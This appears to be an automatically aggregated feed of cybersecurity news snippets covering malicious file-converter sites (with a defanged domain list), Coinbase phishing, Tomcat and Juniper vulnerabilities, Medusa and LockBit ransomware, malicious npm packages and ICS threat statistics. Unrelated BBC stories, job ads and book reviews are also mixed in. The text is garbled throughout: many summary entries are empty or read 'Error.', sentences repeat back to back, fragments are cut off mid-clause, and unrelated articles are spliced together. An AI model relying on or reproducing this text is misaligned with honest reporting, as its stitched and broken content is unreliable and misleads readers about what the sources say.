Ingeniously, the intent of the email is not to steal the user"s recovery seed (and thus gain access to their Coinbase wallet) but rather trick the user into setting up and transferring their funds into a new wallet, for which the scammer already knows the recovery phrase. "Malware peddlers are increasingly targeting users who are searching for free file converter services (websites) and tools, the FBI’s Denver Field Office has warned earlier this month. “To conduct this scheme, cyber criminals across the globe are using any type of free document converter or downloader tool. This might be a website claiming to convert one type of file to another, such as a .doc file to a .pdf file. It might also claim to … More
The post FBI: Free file converter sites and tools deliver malware appeared first on Help Net Security.
"Autosummary:
He also provided a list of domains hosting sites that ostensibly provide file conversion services or tools, but actually engage in phishing and delivering trojans, adware and “riskware” – a category that encompasses programs that are not strictly malicious, but pose some sort of risk for the user (e.g., programs that can be used as a backdoor for other malware, may be illegal, or may violate the terms of service of other software or a user platform): Imageconvertors[.]com (Phishing) (Phishing) Convertitoremp3[.]it (Riskware) (Riskware) Convertisseurs-pdf[.]com (Riskware) (Riskware) Convertscloud[.]com "Autosummary:
"The investigated applications bypass Android security restrictions to start activities even if they are not running in the foreground and, without required permissions to do so, spam the users with continuous, full-screen ads," the company added. "Autosummary:
As the researchers found while investigating in-the-wild ZDI-CAN-25373 exploitation, the security flaw has been exploited in widespread attacks by many state-sponsored threat groups and cybercrime gangs, including Evil Corp, APT43 (Kimsuky), Bitter, APT37, Mustang Panda, SideWinder, RedHotel, Konni, and others. "Autosummary:
Exposed AMI MegaRAC instances (Eclypsium) As part of their research into MegaRAC vulnerabilities (collectively tracked as BMC&C), Eclypsium analysts disclosed five more flaws in December 2022 and January 2023 (CVE-2022-40259, CVE-2022-40242, CVE-2022-2827, CVE-2022-26872, and CVE-2022-40258) that can be exploited to hijack, brick, or remotely infect compromised servers with malware. "Autosummary:
Telemetry data indicates that governments, private entities, financial organizations, think tanks, telecommunication service providers, and military/defense agencies located in the United States, Canada, Russia, South Korea, Vietnam, and Brazil have become the primary targets of attacks exploiting the vulnerability. "Autosummary:
"Autosummary:
ChatGPT SSRF bug quickly becomes a favorite attack vector Pierluigi Paganini March 18, 2025 March 18, 2025 Threat actors exploit a server-side request forgery (SSRF) flaw, tracked as CVE-2024-27564, in ChatGPT, to target US financial and government organizations. "Autosummary:
" An analysis of the stolen files concluded on February 21, 2025, and found they contained customer personal information, including your name and Social Security number, as well as their dates of birth, financial account numbers, driver"s license numbers, tax identification numbers, and/or passport information if it was provided to Western Alliance. "Autosummary:
The attacks carried out by the threat actors aimed at organizations across the government, financial, telecommunications, military, and energy sectors in North America, Europe, Asia, South America, and Australia. Since 2017, the vulnerability has been exploited by APT groups from North Korea, Iran, Russia, and China. "Autosummary:
"Ransomware negotiations are a high-stakes game where every decision matters. In this Help Net Security video, Kurtis Minder, CEO at GroupSense, takes us inside the world of ransomware negotiations. We learn how attackers communicate, the tough decisions victims face, and the mistakes that can make or break a response. He breaks down the key factors in deciding whether to engage with hackers, the legal and ethical considerations, and why preparation is everything. Learn why logging … More
The post Pay, fight, or stall? The dilemma of ransomware negotiations appeared first on Help Net Security.
"Autosummary:
"Packed with real-world case studies and practical examples, Cybersecurity Tabletop Exercises offers insights into how organizations have successfully leveraged tabletop exercises to identify security gaps and enhance their incident response strategies. The authors explore a range of realistic scenarios, including phishing campaigns, ransomware attacks, and insider threats, demonstrating how these exercises can uncover vulnerabilities before an actual crisis occurs. It also highlights key lessons learned from exercises that didn’t go as planned, providing a well-rounded … More
The post Review: Cybersecurity Tabletop Exercises appeared first on Help Net Security.
"Autosummary:
Real-world examples The book uses a practical, step-by-step approach, guiding readers through every phase of a successful tabletop exercise, from initial planning and execution to follow-up evaluations. "Autosummary:
"Autosummary:
"Autosummary:
Researcher releases free GPU-Based decryptor for Linux Akira ransomware Pierluigi Paganini March 17, 2025 March 17, 2025 A researcher released a free decryptor for Linux Akira ransomware, using GPU power to recover keys through brute force.The researcher analyzed log files, file metadata, and hardware benchmarks to estimate encryption timestamps, making brute-forcing decryption keys more efficient. "Autosummary:
This group includes Windows computers that serve one or several of the following purposes: Supervisory control and data acquisition (SCADA) servers Building automation servers Data storage (Historian) servers Data gateways (OPC) Stationary workstations of engineers and operators Mobile workstations of engineers and operators Human machine interface (HMI) Computers used to manage technological and building automation networks Computers of ICS/PLC programmers Computers that share statistics with us belong to organizations from various industries. Regions ranked by percentage of ICS computers on which spyware was blocked, Q4 2024 In almost all regions, spyware does not rank higher than third in the threat category rankings by percentage of ICS computers on which it was blocked, except in the following regions: East Asia : in this region, spyware is the number one malware category in terms of the percentage of ICS computers on which it was blocked. Regions ranked by percentage of ICS computers on which malicious objects were blocked, Q4 2024 All regions ranked by percentage of ICS computers on which malicious objects were blocked in the fourth quarter can be divided into three groups: Over 25% Africa – 31.0% South-East Asia – 30.1% Middle East – 25.7% In the regions within this group, OT computers are generally overexposed to cyberthreats. However, in Q4 2024, this category ranked higher than the corresponding global ranking (ninth place) in the following regions: South-East Asia – fifth place in the regional ranking place in the regional ranking East Asia – seventh place in the regional ranking The only three regions with growth in the percentage of ICS computers on which malware for AutoCAD was blocked were South-East Asia, South Asia, and Central Asia. , the region has a noticeably higher percentage of ICS computers on which the following were blocked: Threat sources In Q4 2024, East Asia ranked first again among the regions by percentage of ICS computers on which malicious threats from network folders were blocked, surpassing the global average by 3.4 times (exceeding Q3 2024 levels). , the region has a higher percentage of ICS computers on which the following were blocked: Threat sources In Q4 2024, Southern Europe again ranked first globally in the percentage of ICS computers where malicious threats from email clients were blocked, exceeding the global average by 2.4 times. Quarterly changes and trends Threat categories The largest proportional increase in Q4 2024 was in the percentage of ICS computers on which the following were blocked: in Q4 2024 was in the percentage of ICS computers on which the following were blocked: Spyware: by 1.3 times, ranked second globally in terms of growth. , the region also has a significantly higher percentage of ICS computers on which the following were blocked: Threat sources The region ranked second in the world by percentage of ICS computers on which threats from network folders were blocked, exceeding the global average by 2.9 times (surpassing Q3 2024 levels). Quarterly changes and trends Threat categories The largest proportional increase in Q4 2024 was in the percentage of ICS computers on which the following were blocked : in Q4 2024 was in the percentage of ICS computers on which the following were blocked Malicious scripts and phishing pages: by 1.3 times, first in the world in terms of growth. Quarterly changes and trends Threat categories The largest proportional increase in Q4 2024 was in the percentage of ICS computers on which the following were blocked: in Q4 2024 was in the percentage of ICS computers on which the following were blocked: Web miners: by 1.3 times, third globally in terms of growth. Changes in the percentage of ICS computers on which miners in the form of executable files for Windows were blocked, Q4 2024 Covert cryptomining programs Web miners running in browsers The three leading regions by percentage of ICS computers on which web miners running in browsers were blocked were: the Middle East, Africa, and Eastern Europe. Changes in the percentage of ICS computers on which malicious scripts and phishing pages were blocked, Q4 2024 Malicious documents Southern Europe, Latin America, and the Middle East ranked as the top three regions by the percentage of ICS computers on which malicious documents were blocked. Quarterly changes and trends Threat categories The largest proportional increase in Q4 2024 was in the percentage of ICS computers on which the following were blocked: in Q4 2024 was in the percentage of ICS computers on which the following were blocked: Malicious scripts and phishing pages: by 1.2 times. Quarterly changes and trends Threat categories The largest proportional increase in Q4 2024 was in the percentage of ICS computers on which the following were blocked: in Q4 2024 was in the percentage of ICS computers on which the following were blocked: Malicious scripts and phishing pages: by 1.2 times. Changes in the percentage of ICS computers on which denylisted internet resources were blocked, Q4 2024 Malicious scripts and phishing pages The top three regions by percentage of ICS computers on which malicious scripts and phishing pages were blocked were Africa, Southern Europe, and Latin America. Comparative analysis Threat categories Compared to the global average , the region has a higher percentage of ICS computers on which the following were blocked: Malicious documents: 2.2 times higher (surpassing Q3 2024 levels), ranked first by value among the regions. Changes in the percentage of ICS computers on which malicious documents were blocked, Q4 2024 Next-stage malware Malicious objects used to initially infect computers deliver next-stage malware – spyware, ransomware, and miners – to victims’ computers. Regions ranked by percentage of ICS computers on which threats from email clients were blocked, Q4 2024 Denylisted internet resources Africa, South-East Asia, and Central Asia ranked as the top three regions by the percentage of ICS computers on which denylisted internet resources were blocked. Changes in the percentage of ICS computers on which spyware was blocked, Q4 2024 Covert cryptomining programs Miners in the form of executable files for Windows In the fourth quarter of 2024, similar to the previous quarter, a significant portion of Windows miners found on ICS computers consisted of archives with names mimicking legitimate software. , the region has a noticeably of ICS computers on which the following threat categories were blocked: Threat sources The region ranked third in the world by percentage of ICS computers on which threats from email clients were blocked, exceeding the global average by 1.7 times. Quarterly changes and trends Threat categories The largest proportional increase in Q4 2024 was in the percentage of ICS computers on which the following were blocked: in Q4 2024 was in the percentage of ICS computers on which the following were blocked: Spyware: by 1.2 times. Quarterly changes and trends Threat categories The largest proportional increase in Q4 2024 was in the percentage of ICS computers on which the following were blocked: in Q4 2024 was in the percentage of ICS computers on which the following were blocked: Malware for AutoCAD: by 1.3 times. Comparative analysis Threat categories Compared to the global figures , the region has a noticeably higher percentage of ICS computers on which the following threat categories were blocked: Malicious documents: 1.9 times higher, ranked second by value among the regions. , the region has a of ICS computers on which the following were blocked: Threat sources South Asia ranks third globally by percentage of ICS computers on which malicious threats from removable devices were blocked, surpassing the global average by 1.8 times. Quarterly changes and trends Threat categories The largest proportional increase in Q4 2024 was in the percentage of ICS computers on which the following were blocked: in was in the percentage of ICS computers on which the following were blocked: Ransomware: by 1.3 times. Comparative analysis Threat categories Compared to the global figures, the region has a higher percentage of ICS computers on which miners in the form of executable files for Windows were blocked: 1.5 times higher (surpassing Q3 2024 levels), ranked second by value globally. Comparative analysis Threat categories Compared to the global figures , the region has a higher percentage of ICS computers on which the following were blocked: Malicious documents, 1.2 times higher (surpassing Q3 2024 levels). Regions ranked by percentage of ICS computers on which malicious scripts and phishing pages were blocked, Q4 2024 The top three regions in terms of growth in the percentage of ICS computers on which malicious scripts and phishing pages were blocked were Africa, Southern Europe, and the Middle East. Changes in the percentage of ICS computers on which worms were blocked, Q4 2024 Viruses The top three regions by percentage of ICS computers on which viruses were blocked remained South-East Asia, Africa, and East Asia. , the region has a higher percentage of ICS computers on which the following were blocked: Threat sources The percentage of ICS computers on which threats from removable devices were blocked exceeded the global average by 1.3 times in Q4 2024. Changes in the percentage of ICS computers on which web miners were blocked, Q4 2024 Ransomware The top three regions with the highest percentage of ICS computers on which ransomware was blocked were the Middle East, Africa, and South Asia. Comparative analysis Threat categories Compared to the global average , the region has a noticeably higher percentage of ICS computers on which the following were blocked: Malware for AutoCAD: 3.8 times higher, ranked second by value globally. Comparative analysis Threat categories Compared to the global average , the region has a higher percentage of ICS computers on which the following were blocked: Miners in the form of executable files for Windows: 2.1 times higher, ranks first by value globally. "Autosummary:
This group includes Windows computers that serve one or several of the following purposes: Supervisory control and data acquisition (SCADA) servers Building automation servers Data storage (Historian) servers Data gateways (OPC) Stationary workstations of engineers and operators Mobile workstations of engineers and operators Human machine interface (HMI) Computers used to manage technological and building automation networks Сomputers of ICS/PLC programmers Computers that share statistics with us belong to organizations from various industries.Main threat sources Internet 10.84% 9.98% ▼0.86 pp Email clients 2.95% 2.72% ▼0.23 pp Removable media 0.69% 0.64% ▼0.05 pp Network folders 0.11% 0.08% ▼0.03 pp Statistics across all threats In the fourth quarter of 2024, the percentage of ICS computers on which malicious objects were blocked decreased by 0.1 pp from the previous quarter to 21.9%.Q4 in numbers Parameter Q3 2024 Q4 2024 Quarterly changes Global percentage of attacked ICS computers 22.0% 21.9% ▼0.1 pp Percentage of ICS computers on which malicious objects from different categories were blocked Malicious scripts and phishing pages (JS and HTML) 6.24% 7.11% ▲0.87 pp Denylisted internet resources 6.84% 5.52% ▼1.32 pp Spy Trojans, backdoors and keyloggers 3.91% 4.30% ▲0.39 ppThe most common are the chemical industry, metallurgy, ICS design and integration, oil and gas, energy, transport and logistics, food industry, light industry, pharmaceuticals. Percentage of ICS computers on which malicious objects were blocked, Jan 2023-Dec 2024 Regionally, the percentage of ICS computers that blocked malicious objects during the quarter ranged from 10.6% in Northern Europe to 31% in Africa. Percentage of ICS computers on which malicious objects were blocked, by quarter, 2022-2024 Compared to the fourth quarter of 2023, the percentage decreased by 2.5 pp. Percentage of ICS computers on which malicious objects were blocked in selected industries Diversity of detected malicious objects Malicious objects of various categories, which Kaspersky products block on ICS computers, can be divided into three groups according to their distribution method and purpose. "Autosummary:
" The Tomcat RCE The CVE-2025-24813 remote code execution vulnerability flaw was first disclosed by Apache on Monday 10, 2025, impacting Apache Tomcat 11.0.0-M1 to 11.0.2, 10.1.0-M1 to 10.1.34, and 9.0.0.M1 to 9.0.98. "Autosummary:
"Autosummary:
"Autosummary:
This week"s list includes — CVE-2025-24983, CVE-2025-24984, CVE-2025-24985, CVE-2025-24991, CVE-2025-24993, CVE-2025-26633 (Microsoft Windows), CVE-2025-24201 (Apple iOS, iPadOS, macOS Sequoia, Safari, and VisionOS), CVE-2025-25291, CVE-2025-25292 (ruby-saml), CVE-2025-27363 (FreeType), CVE-2024-12297 (Moxa PT switches), CVE-2025-27816 (Arctera InfoScale product), CVE-2025-24813 (Apache Tomcat), CVE-2025-27636 (Apache Camel), CVE-2025-27017 (Apache NiFi), CVE-2024-56336 (Siemens SINAMICS S200), CVE-2024-13871, CVE-2024-13872 (Bitdefender BOX v1), CVE-2025-20115 (Cisco IOS XR), CVE-2025-27593 (SICK DL100-2xxxxxxx), CVE-2025-27407 (graphql), CVE-2024-54085 (AMI), CVE-2025-27509 (Fleet), and CVE-2024-57040 (TP-Link TL-WR845N router).It simplifies vulnerability tracking, device health monitoring, security policies, and license management across macOS, Windows, Linux, cloud platforms, and IoT. Fleet is modular, and lightweight, integrates smoothly with popular tools, and offers a free, flexible solution tailored to your needs. — Five high-severity security flaws have been disclosed in a Supervisory Control and Data Acquisition (SCADA) system named ICONICS Suite – CVE-2024-1182, CVE-2024-7587, CVE-2024-8299, CVE-2024-9852, and CVE-2024-8300 – that allows an authenticated attacker to execute arbitrary code, elevate privileges, and manipulate critical files.Security Flaws in ICONICS Suite Disclosed — Five high-severity security flaws have been disclosed in a Supervisory Control and Data Acquisition (SCADA) system named ICONICS Suite – CVE-2024-1182, CVE-2024-7587, CVE-2024-8299, CVE-2024-9852, and CVE-2024-8300 – that allows an authenticated attacker to execute arbitrary code, elevate privileges, and manipulate critical files.The campaign, ongoing since December 2024, casts a wide geographical net, spanning North America, Oceania, South and Southeast Asia, and Northern, Southern, Eastern, and Western Europe.The campaign, ongoing since December 2024, casts a wide geographical net, spanning North America, Oceania, South and Southeast Asia, and Northern, Southern, Eastern, and Western Europe.The payloads take the form of MSI installers and ELF binaries that are designed to drop the miner that singles out Monero, Sumokoin, ArQma, Graft, Ravencoin, Wownero, Zephyr, Townforge, and YadaCoin.The payloads take the form of MSI installers and ELF binaries that are designed to drop the miner that singles out Monero, Sumokoin, ArQma, Graft, Ravencoin, Wownero, Zephyr, Townforge, and YadaCoin.Leveraging direct syscall execution, memory analysis, and syscall hooking detection, ZeroProbe enables stealthy, forensic-friendly security assessments on Windows 10, 11, and Server 2019, compatible across PowerShell versions." — Threat actors like TA583, TA2725, and UAC-0050 are increasingly using legitimate remote monitoring and management (RMM) tools such as ScreenConnect, Fleetdeck, Atera, and Bluetrait as a first-stage payload in email campaigns.Threat Actors Intensify Abuse of Remote Access Tools — Threat actors like TA583, TA2725, and UAC-0050 are increasingly using legitimate remote monitoring and management (RMM) tools such as ScreenConnect, Fleetdeck, Atera, and Bluetrait as a first-stage payload in email campaigns.While enclave modules have to be signed with a Microsoft-issued certificate to load, a threat actor could rely on an operating system flaw (CVE-2024-49706) to load an unsigned module into an enclave, obtain access to a Trusted Signing entity and sign their own enclaves, or even abuse debuggable and vulnerable enclaves (e.g., CVE-2023-36880) to read and write arbitrary data inside the enclave. — Espressif, the manufacturer of ESP32, a low-cost, low-power microcontroller with integrated Wi-Fi and dual-mode Bluetooth capabilities, has pushed back against claims of a backdoor in its products.ESP32 Chip Backdoor Claims Disputed — Espressif, the manufacturer of ESP32, a low-cost, low-power microcontroller with integrated Wi-Fi and dual-mode Bluetooth capabilities, has pushed back against claims of a backdoor in its products.Three of these packages, acloud-client, enumer-iam, and tcloud-python-test, has been listed as dependencies of a relatively popular GitHub project named accesskey_tools that has been forked 42 times and starred 519 times. "Autosummary:
"In just the past few months, I have witnessed two different methods for executing a ransomware attack using nothing but legitimate cloud security features," warns Brandon Evans, security consultant and SANS Certified Instructor. "Autosummary:
Imageconvertors[.]com (phishing) convertitoremp3[.]it (Riskware) convertisseurs-pdf[.]com (Riskware) convertscloud[.]com (Phishing) convertix-api[.]xyz (Trojan) convertallfiles[.]com (Adware) freejpgtopdfconverter[.]com (Riskware) primeconvertapp[.]com (Riskware) 9convert[.]com (Riskware) Convertpro[.]org (Riskware) We don’t just report on threats – we help safeguard your entire digital identity Cybersecurity risks should never spread beyond a headline. "Autosummary:
The vulnerability, tracked as CVE-2025-24813, affects the below versions - Apache Tomcat 11.0.0-M1 to 11.0.2 Apache Tomcat 10.1.0-M1 to 10.1.34 Apache Tomcat 9.0.0-M1 to 9.0.98 It concerns a case of remote code execution or information disclosure when specific conditions are met - Writes enabled for the default servlet (disabled by default) "Autosummary:
Attackers use CSS to create evasive phishing messages Pierluigi Paganini March 17, 2025 March 17, 2025 Threat actors exploit Cascading Style Sheets (CSS) to bypass spam filters and detection engines, and track users’ actions and preferences.Note that this preheader text is kept hidden by relying on multiple CSS properties, including color, height, max-height, and max-width. "Autosummary:
Researcher releases free GPU-Based decryptor for Linux Akira ransomware Pierluigi Paganini March 17, 2025 March 17, 2025 A researcher released a free decryptor for Linux Akira ransomware, using GPU power to recover keys through brute force.The researcher analyzed log files, file metadata, and hardware benchmarks to estimate encryption timestamps, making brute-forcing decryption keys more efficient. "Autosummary:
Error. "Autosummary:
"I want to thank the investigative judges for letting this happen, as well as my lawyers and team for their relentless efforts in demonstrating that, when it comes to moderation, cooperation, and fighting crime, for years Telegram not only met but exceeded its legal obligations. "Autosummary:
After being deployed on compromised systems, attackers can use StilachiRAT to siphon digital wallet data by scanning the configuration information of 20 cryptocurrency wallet extensions, including Coinbase Wallet, Phantom, Trust Wallet, Metamask, OKX Wallet, Bitget Wallet, and others. "Autosummary:
“If all of the following were true, a malicious user was able to view security sensitive files and/or inject content into those files: writes enabled for the default servlet (disabled by default) support for partial PUT (enabled by default) a target URL for security sensitive uploads that is a sub-directory of a target URL for public uploads attacker knowledge of the names of security sensitive files being uploaded the security sensitive files also being uploaded via partial PUT If all of the following were true, a malicious user was able to perform remote code execution: writes enabled for the default servlet (disabled by default) support for partial PUT (enabled by default) "Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: NIST selects HQC as backup algorithm for post-quantum encryption Last year, NIST standardized a set of encryption algorithms that can keep data secure from a cyberattack by a future quantum computer. Now, NIST has selected a backup algorithm that can provide a second line of defense for the task of general encryption, which safeguards internet traffic and stored data alike. … More
The post Week in review: NIST selects HQC for post-quantum encryption, 10 classic cybersecurity books appeared first on Help Net Security.
"Autosummary:
Hetty: Open-source HTTP toolkit for security research Hetty is an open-source HTTP toolkit designed for security research, offering a free alternative to commercial tools like Burp Suite Pro. Defending against EDR bypass attacks In this Help Net Security video, John Dwyer, Director of Security Research at Binary Defense, discusses how over-reliance on EDR and lack of monitoring EDR telemetry health has become a risk in corporate security, the evolving tools and techniques attackers are using, and key mistakes companies are making when it comes to their EDR. New infosec products of the week: March 14, 2025 Here’s a look at the most interesting products from the past week, featuring releases from Alloy, Detectify, Pondurance, and SimSpace. "Autosummary:
On March 11, 2025, Yap’s Health Department detected a ransomware attack, shutting down its network and digital health systems to contain the threat. "Autosummary:
"Autosummary:
Denmark warns of increased state-sponsored campaigns targeting the European telcos Pierluigi Paganini March 16, 2025 March 16, 2025 Denmark ‘s cybersecurity agency warns of increased state-sponsored campaigns targeting the European telecom companies Denmark raised the cyber espionage threat level for its telecom sector from medium to high due to rising threats across Europe. The Danish telecom sector faces multiple cyber threats: espionage, destructive attacks (MEDIUM), cyber activism (HIGH), and criminal hackers (VERY HIGH), including ransomware. In February, 2025, Cisco Talos researchers reported that China-linked APT group Salt Typhoon uses a custom-built utility, dubbed JumbledPath, to spy on network traffic of U.S. telecommunication providers. "Autosummary:
The University of Pittsburgh, where Ms Konanki is a student, said in a statement they are working with the Federal Bureau of Investigations, the Drug Enforcement Administration, Department of Homeland Security and local authorities in response to her disappearance.Save Rachel Looker BBC News, Washington DC Share Save Defensa Civil Dominicana Search efforts for a missing University of Pittsburgh student who disappeared on spring break while in the Dominican Republican have entered their second week. "Autosummary:
As always, when attempting to decrypt files, make a backup of the original encrypted files, as there"s a possibility that files can be corrupted if the wrong decryption key is used. "Autosummary:
The flaw impacts iPhone XS and later, iPad Pro 13-inch, iPad Pro 12.9-inch 3rd generation and later, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 7th generation and later, and iPad mini 5th generation and later, Macs running macOS Sequoia, and Apple Vision Pro. Apple did not disclose details about the attacks or attribute them to any threat actor. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added the following vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog: CVE-2025-21590 Juniper Junos OS Improper Isolation or Compartmentalization Vulnerability CVE-2025-24201 Apple Multiple Products WebKit Out-of-Bounds Write Vulnerability The vulnerability CVE-2025-21590 is an Improper Isolation or Compartmentalization issue in the kernel of Juniper Networks Junos OS that allows a local attacker with high privileges to compromise the integrity of the device. "Autosummary:
The binary, codenamed PackerE, is responsible for downloading an encrypted DLL, which, in turn, loads a second DLL file that launches the MassJacker payload by injecting it into a legitimate Windows process called "InstalUtil.exe. "Autosummary:
"OBSCURE#BAT demonstrates a highly evasive attack chain, leveraging obfuscation, stealth techniques, and API hooking to persist on compromised systems while evading detection," the researchers said. "Autosummary:
Through a live demonstration, he will break down every technical step of a ransomware attack, showing you how hackers exploit vulnerabilities and encrypt data—in clear, simple language. "Autosummary:
The activity could be spotted by analyzing logs where it appears as jsconsole(IP), with the IP address often spoofed as 127.0.0.1, 13.73.13.73, 8.8.8.8, 1.1.1.1, or other recognizable addresses : Attackers exploit the WebSocket vulnerability via the jsconsole interface. However Mora_001 is tracked as an independent threat actor, it exhibits consistent post-exploitation tactics, including identical usernames across victims, overlapping IPs, and rapid ransomware deployment within 48 hours. "Autosummary:
Analysis of the source code indicates that the framework was specifically designed to brute-force credentials on the following VPN and remote-access products: SonicWall NetExtender, Palo Alto GlobalProtect, Cisco AnyConnect, Fortinet SSL VPN, Citrix NetScaler (Citrix Gateway), Microsoft RDWeb (Remote Desktop Web Access), and WatchGuard SSL VPN. "Autosummary:
IOS XR runs on the company"s carrier-grade, Network Convergence System (NCS), and Carrier Routing System (CRS) series of routers, such as the ASR 9000, NCS 5500, and 8000 series. "Autosummary:
Other prominent LockBit members who have been charged in the U.S. include Mikhail Vasiliev (awaiting sentencing), Ruslan Astamirov (awaiting sentencing), Artur Sungatov (wanted), Ivan Kondratyev (wanted), and Mikhail Matveev (wanted). "Autosummary:
"Autosummary:
“As alleged in the superseding complaint, at the time of Panev’s arrest in Israel in August, law enforcement discovered on Panev’s computer administrator credentials for an online repository that was hosted on the dark web and stored source code for multiple versions of the LockBit builder, which allowed LockBit’s affiliates to generate custom builds of the LockBit ransomware malware for particular victims. "Autosummary:
As the email appears to have been sent directly through SendGrid and what appears to be Akamai"s account, it passes the SPF, DMARC, and DKIM email security checks, bypassing spam filters on many accounts. "Reminder: Beware of recovery phrase scams," Coinbase posted on X. "We"re aware of new phishing emails going around pretending to be Coinbase and Coinbase Wallet. "Cybersecurity constantly evolves, but some books have stood the test of time, shaping how professionals think about security, risk, and digital threats. Whether you’re a CISO, a seasoned expert, or cybersecurity enthusiast, these must-reads belong on your shelf. Masters of Deception: The Gang That Ruled Cyberspace Author: Michele Slatalla Set against the backdrop of the 1990 AT&T phone network crash, Masters of Deception chronicles an important moment in hacker history: law enforcement cracked down on … More
The post Cybersecurity classics: 10 books that shaped the industry appeared first on Help Net Security.
"Autosummary:
Through meticulous research and firsthand interviews, Krebs unravels the rise of digital crime syndicates that flood inboxes with fraudulent pharmacy ads, malware, and phishing schemes—operations that steal identities, drain bank accounts, and even endanger lives. Author: Kim Zetter In Countdown to Zero Day, journalist Kim Zetter unravels the gripping story of Stuxnet, the world’s first true cyberweapon, a sophisticated piece of malware designed not just to steal data but to cause real-world destruction. "Cloud Security Engineer TUI Group | Portugal | Hybrid – View job details As a Cloud Security Engineer, you will contribute to the implementation of security solutions and will work alongside our Security Operations team to ensure appropriate controls are engineered, addressing the technical requirements of our global business. You will support the implementation and maintenance of identity protection, threat detection, and email security solutions across Microsoft 365 environment. Cybersecurity Architect ExpressVPN | Poland | … More
The post Cybersecurity jobs available right now in Europe: March 13, 2025 appeared first on Help Net Security.
"Autosummary:
Senior Enterprise IT and OT Security Architect Volvo Group | Sweden | On-site – View job details As a Senior Enterprise IT and OT Security Architect, you will develop security architectural frameworks and blueprints that guide the design, development, and implementation of secure infrastructure, encompassing data protection, authentication, authorization, encryption, and allied security measures. Security Architect (SIEM) EPAM Systems | Latvia | Remote – View job details As a Security Architect (SIEM), you will lead the design, deployment, and configuration of SIEM solutions, ensuring seamless integration with various security tools, systems, and log sources. Cybersecurity Architect ExpressVPN | Poland | Hybrid – View job details As a Cybersecurity Architect, you will plan, implement, manage, monitor and upgrade security measures/architectures for the protection of the organization’s data, systems, and networks. SecOps Engineer Showpad | Romania | Hybrid – View job details As a SecOps Engineer, you will monitor and respond to security events involving vulnerabilities, endpoints, user behavior analytics, firewalls, IDS/IPS, and external threat intelligence. "Autosummary:
"Autosummary:
As of February 2025, Medusa developers and affiliates have impacted over 300 victims from a variety of critical infrastructure sectors with affected industries including medical, education, legal, insurance, technology, and manufacturing.” reads the joint advisory. The FBI, CISA, and MS-ISAC have issued a joint advisory detailing Medusa ransomware tactics, techniques, and indicators of compromise (IOCs) based on FBI investigations as recent as February 2025. "Autosummary:
As of February 2025, the Medusa ransomware operation, which we have previously detailed on the Tripwire State of Security blog, had hit over 300 organisations from a variety of critical infrastructure sectors with affected industries including education, health, legal, insurance, technology, and manufacturing. "Autosummary:
The backup paradox: Essential yet increasingly unreliable Data backup and recovery should be a safety net for businesses, but for many, it has become a source of frustration, complexity and risk. The lessons learned: What IT leaders must prioritize now The State of Backup and Recovery Report 2025 reveals that critical security gaps remain while securing on-premises, cloud, endpoint and SaaS data.Notably, SaaS platforms now serve as the backbone of daily business operations, but without the right backup strategies, this data remains vulnerable. Alarmingly, more than 10% of businesses don"t even know how long it would take to recover their business-critical SaaS data , if they could recover it at all.With hybrid work the new standard and cloud adoption on the rise, data is increasingly distributed across different environments, providers and locations, expanding the attack surface for emerging cyberthreats. To help IT teams and managed service providers (MSPs) understand how their peers are navigating these challenges, the State of Backup and Recovery Report 2025 has gathered insights from more than 3,000 IT professionals, security experts and administrators worldwide. "Autosummary:
"Autosummary:
Save Bethany Bell and Gillian Hazell BBC News, in Rome Reporting from Rome Share Save BBC Arianna, a student from Piacenza in Italy, said she had been "really concerned" about the Pope"s health Catholics around the world are marking the 12th anniversary of Pope Francis"s election as pontiff by praying for his recovery. "Autosummary:
" The vulnerability impacts NFX-Series, Virtual SRX, SRX-Series Branch, SRX-Series HE, EX-Series, QFX-Series, ACX, and MX-Series devices and was resolved in 21.4R3-S10, 22.2R3-S6, 22.4R3-S6, 23.2R2-S3, 24.2R1-S2, 24.2R2, 24.4R1, and all subsequent releases. "Autosummary:
"This phishing attack specifically targets individuals in hospitality organizations in North America, Oceania, South and Southeast Asia, and Northern, Southern, Eastern, and Western Europe, that are most likely to work with Booking.com, sending fake emails purporting to be coming from the agency," Microsoft said in a report shared with The Hacker News." The command, in a nutshell, uses the legitimate mshta.exe binary to drop the next-stage payload, which comprises various commodity malware families like XWorm, Lumma stealer, VenomRAT, AsyncRAT, Danabot, and NetSupport RAT. "Autosummary:
The list of now-removed packages is below - is-buffer-validator yoojae-validator event-handle-package array-empty-validator react-event-dependency auth-validator The packages are designed to collect system environment details, as well as credentials stored in web browsers such as Google Chrome, Brave, and Mozilla Firefox. The malware is designed to collect a wide range of data from the compromised device, including SMS messages, call logs, device location, files in local storage, screenshots, keystrokes, Wi-Fi network information, and the list of installed applications. "Autosummary:
"Autosummary:
Mora_001"s attack chain overview Source: Forescout After this, the attacker maps the network and attempts lateral movement using stolen VPN credentials and newly added VPN accounts, Windows Management Instrumentation (WMIC) & SSH, and TACACS+/RADIUS authentication. "Cybersecurity is a high-stakes, high-pressure field in which CISOs and their teams constantly battle threats, compliance requirements, and business expectations. The demand for 24/7 vigilance, sophisticated attacks, and a shortage of skilled professionals have led to a burnout epidemic in the industry. For CISOs, this isn’t just a personal issue, it’s a business risk. A burned-out team is less effective, more prone to errors, and more likely to leave, creating knowledge gaps that further strain … More
The post Burnout in cybersecurity: How CISOs can protect their teams (and themselves) appeared first on Help Net Security.
"Autosummary:
These challenges are placing immense pressure on CISOs, resulting in heightening stress and the risk of burnout on them and their teams,” Brian Honan, CEO at BH Consulting, told Help Net Security.Cybersecurity is a high-stakes, high-pressure field in which CISOs and their teams constantly battle threats, compliance requirements, and business expectations. Managing the workload: Prioritization and automation Security teams are overwhelmed by a never-ending stream of alerts, incidents, and compliance requirements. “In addition to managing cyber threats and changing business challenges, today’s CISO must also deal with the increasing burden to deal with regulations such as the EU GDPR, NIS2, and DORA. "Autosummary:
"Autosummary:
"Autosummary:
